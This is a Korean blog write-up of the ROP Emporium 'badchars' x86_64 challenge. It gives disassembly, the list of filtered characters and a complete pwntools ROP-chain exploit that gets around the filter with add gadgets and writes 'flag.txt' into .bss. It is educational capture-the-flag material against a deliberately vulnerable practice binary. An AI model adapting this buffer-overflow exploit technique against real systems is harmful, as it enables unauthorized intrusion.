badchar

728x90

1. intro

2. code 및 분석

2.1. code

usefulGadget

   0x0000000000400628 <+0>:     xor    %r14b,(%r15)
   0x000000000040062b <+3>:     ret
   0x000000000040062c <+4>:     add    %r14b,(%r15)
   0x000000000040062f <+7>:     ret
   0x0000000000400630 <+8>:     sub    %r14b,(%r15)
   0x0000000000400633 <+11>:    ret
   0x0000000000400634 <+12>:    mov    %r12,0x0(%r13)
   0x0000000000400638 <+16>:    ret
   0x0000000000400639 <+17>:    nopl   0x0(%rax)

pwnme

   0x00000000000008fa <+0>:     push   %rbp
   0x00000000000008fb <+1>:     mov    %rsp,%rbp
   0x00000000000008fe <+4>:     sub    $0x40,%rsp
   0x0000000000000902 <+8>:     mov    0x2006cf(%rip),%rax        # 0x200fd8
   0x0000000000000909 <+15>:    mov    (%rax),%rax
   0x000000000000090c <+18>:    mov    $0x0,%ecx
   0x0000000000000911 <+23>:    mov    $0x2,%edx
   0x0000000000000916 <+28>:    mov    $0x0,%esi
   0x000000000000091b <+33>:    mov    %rax,%rdi
   0x000000000000091e <+36>:    call   0x7e0 <setvbuf@plt>
   0x0000000000000923 <+41>:    lea    0x17a(%rip),%rdi        # 0xaa4
   0x000000000000092a <+48>:    call   0x780 <puts@plt>
   0x000000000000092f <+53>:    lea    0x187(%rip),%rdi        # 0xabd
   0x0000000000000936 <+60>:    call   0x780 <puts@plt>
   0x000000000000093b <+65>:    lea    -0x40(%rbp),%rax
   0x000000000000093f <+69>:    add    $0x20,%rax
   0x0000000000000943 <+73>:    mov    $0x20,%edx
   0x0000000000000948 <+78>:    mov    $0x0,%esi
   0x000000000000094d <+83>:    mov    %rax,%rdi
   0x0000000000000950 <+86>:    call   0x7b0 <memset@plt>
   0x0000000000000955 <+91>:    lea    0x16c(%rip),%rdi        # 0xac8
   0x000000000000095c <+98>:    call   0x780 <puts@plt>
   0x0000000000000961 <+103>:   lea    0x181(%rip),%rdi        # 0xae9
   0x0000000000000968 <+110>:   mov    $0x0,%eax
   0x000000000000096d <+115>:   call   0x7a0 <printf@plt>
   0x0000000000000972 <+120>:   lea    -0x40(%rbp),%rax
   0x0000000000000976 <+124>:   add    $0x20,%rax
   0x000000000000097a <+128>:   mov    $0x200,%edx
   0x000000000000097f <+133>:   mov    %rax,%rsi
   0x0000000000000982 <+136>:   mov    $0x0,%edi
   0x0000000000000987 <+141>:   call   0x7c0 <read@plt>
   0x000000000000098c <+146>:   mov    %rax,-0x40(%rbp)
   0x0000000000000990 <+150>:   movq   $0x0,-0x38(%rbp)
   0x0000000000000998 <+158>:   jmp    0x9eb <pwnme+241>
   0x000000000000099a <+160>:   movq   $0x0,-0x30(%rbp)
   0x00000000000009a2 <+168>:   jmp    0x9d5 <pwnme+219>
   0x00000000000009a4 <+170>:   mov    -0x38(%rbp),%rax
   0x00000000000009a8 <+174>:   movzbl -0x20(%rbp,%rax,1),%ecx
   0x00000000000009ad <+179>:   mov    -0x30(%rbp),%rax
   0x00000000000009b1 <+183>:   mov    0x200628(%rip),%rdx        # 0x200fe0
   0x00000000000009b8 <+190>:   movzbl (%rdx,%rax,1),%eax
   0x00000000000009bc <+194>:   cmp    %al,%cl
   0x00000000000009be <+196>:   jne    0x9c9 <pwnme+207>
   0x00000000000009c0 <+198>:   mov    -0x38(%rbp),%rax
   0x00000000000009c4 <+202>:   movb   $0xeb,-0x20(%rbp,%rax,1)
   0x00000000000009c9 <+207>:   mov    -0x30(%rbp),%rax
   0x00000000000009cd <+211>:   add    $0x1,%rax
   0x00000000000009d1 <+215>:   mov    %rax,-0x30(%rbp)
   0x00000000000009d5 <+219>:   mov    -0x30(%rbp),%rax
   0x00000000000009d9 <+223>:   cmp    $0x3,%rax
   0x00000000000009dd <+227>:   jbe    0x9a4 <pwnme+170>
   0x00000000000009df <+229>:   mov    -0x38(%rbp),%rax
   0x00000000000009e3 <+233>:   add    $0x1,%rax
   0x00000000000009e7 <+237>:   mov    %rax,-0x38(%rbp)
   0x00000000000009eb <+241>:   mov    -0x38(%rbp),%rdx
   0x00000000000009ef <+245>:   mov    -0x40(%rbp),%rax
   0x00000000000009f3 <+249>:   cmp    %rax,%rdx
   0x00000000000009f6 <+252>:   jb     0x99a <pwnme+160>
   0x00000000000009f8 <+254>:   lea    0xed(%rip),%rdi        # 0xaec
   0x00000000000009ff <+261>:   call   0x780 <puts@plt>
   0x0000000000000a04 <+266>:   nop
   0x0000000000000a05 <+267>:   leave
   0x0000000000000a06 <+268>:   ret

2.2. 분석

나머지는 앞선 문제와 동일하다.

다만 바이너리를 실행하면 보이는 것과 같이 일부 문자가 필터링 된다.

┌[wyv3rn🐲]-(~/rop)
└> ./badchars
badchars by ROP Emporium
x86_64

badchars are: 'x', 'g', 'a', '.'
>

3. 취약점 확인 및 공격 준비

3.1. 취약점

buffer overflow

3.2. 공격 준비

특정 문자열이 필터링 되지만, usefulGadget에서 보듯 특정 위치의 값을 더하거 뺄 수 있기 때문에 이를 이용해서 문자열을 완성해주면 된다.

4. exploit

from pwn import *

p = process('./badchars')

p_12131415 = 0x40069c
p_1415 = 0x4006a0
xor = 0x400628
add = 0x40062c
sub = 0x400630
mov = 0x400634
bss = 0x601100

pay = b'A'*0x28
pay += p64(p_12131415)
pay += b'fl\x60f\x2dt\x77t'
pay += p64(bss)
pay += p64(1)
pay += p64(bss + 2)
pay += p64(mov)
pay += p64(add)
pay += p64(p_1415)
pay += p64(1)
pay += p64(bss + 3)
pay += p64(add)
pay += p64(p_1415)
pay += p64(1)
pay += p64(bss + 4)
pay += p64(add)
pay += p64(p_1415)
pay += p64(1)
pay += p64(bss + 6)
pay += p64(add)
pay += p64(0x4006a3)
pay += p64(bss)
pay += p64(0x400620)

p.sendafter(b'> ',pay)

p.interactive()

728x90

저작자표시 비영리 변경금지 (새창열림)

'Wargame > ROP Emporium' 카테고리의 다른 글

pivot (0)	2023.07.07
fluff (0)	2023.07.07
write4 (0)	2023.07.07
callme (0)	2023.07.07
split (0)	2023.07.07

1. intro

2. code 및 분석

2.1. code

2.2. 분석

3. 취약점 확인 및 공격 준비

3.1. 취약점

3.2. 공격 준비

4. exploit

'Wargame > ROP Emporium' 카테고리의 다른 글

티스토리툴바